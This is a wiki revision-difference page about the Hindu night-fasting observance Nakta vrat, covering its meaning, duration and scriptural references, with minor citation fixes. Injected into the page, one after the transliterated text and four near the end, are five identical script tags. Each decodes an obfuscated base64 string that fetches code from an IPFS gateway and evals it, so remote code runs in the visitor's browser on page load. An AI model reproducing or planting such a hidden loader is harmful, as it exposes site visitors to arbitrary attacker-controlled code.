Difference between revisions of "नक्त व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*यह दिवारात्रिव्रत है अतः ऐसी तिथि में किया जाता है जो कि रात्रि एवं दिन दोनों में पड़ती हो।<ref>निर्णयामृत 16-17)</ref>  
+
*यह दिवारात्रिव्रत है अतः ऐसी तिथि में किया जाता है जो कि रात्रि एवं दिन दोनों में पड़ती हो।<ref>निर्णयामृत 16-17</ref>  
 
*नक्त का अर्थ है दिन में कुछ न खाकर केवल रात्रि में ही खाना।  
 
*नक्त का अर्थ है दिन में कुछ न खाकर केवल रात्रि में ही खाना।  
 
*नक्तव्रत एक मास या चार मासों या फिर एक वर्ष तक चल सकता है।  
 
*नक्तव्रत एक मास या चार मासों या फिर एक वर्ष तक चल सकता है।  
*कृत्यरत्नाकर<ref>कृत्यरत्नाकर (पृ0 222, 255, 301-303, 406, 445, 477, 491-492)</ref> में श्रावण से माघ तक के मासों के नक्तव्रत का उल्लेख है।
+
*कृत्यरत्नाकर<ref>कृत्यरत्नाकर (पृ0 222, 255, 301-303, 406, 445, 477, 491-492</ref> में श्रावण से माघ तक के मासों के नक्तव्रत का उल्लेख है।
*[[लिंग पुराण]]<ref>लिंग पुराण, (1|83|3-54)</ref> में एक वर्ष के नक्तव्रत की चर्चा है।<ref>और देखिए [[नारद पुराण]] (2|43|11-23)।</ref>
+
*[[लिंग पुराण]]<ref>लिंग पुराण, (1|83|3-54</ref> में एक वर्ष के नक्तव्रत की चर्चा है।<ref>और देखिए [[नारद पुराण]] (2|43|11-23)।</ref>
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 12:43, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah divaratrivrat hai atah aisi tithi mean kiya jata hai jo ki ratri evan din donoan mean p dati ho.[1]
  • nakt ka arth hai din mean kuchh n khakar keval ratri mean hi khana.
  • naktavrat ek mas ya char masoan ya phir ek varsh tak chal sakata hai.
  • krityaratnakar[2] mean shravan se magh tak ke masoan ke naktavrat ka ullekh hai.
  • liang puran[3] mean ek varsh ke naktavrat ki charcha hai.[4]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. nirnayamrit 16-17
  2. krityaratnakar (pri0 222, 255, 301-303, 406, 445, 477, 491-492
  3. liang puran, (1|83|3-54
  4. aur dekhie narad puran (2|43|11-23).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>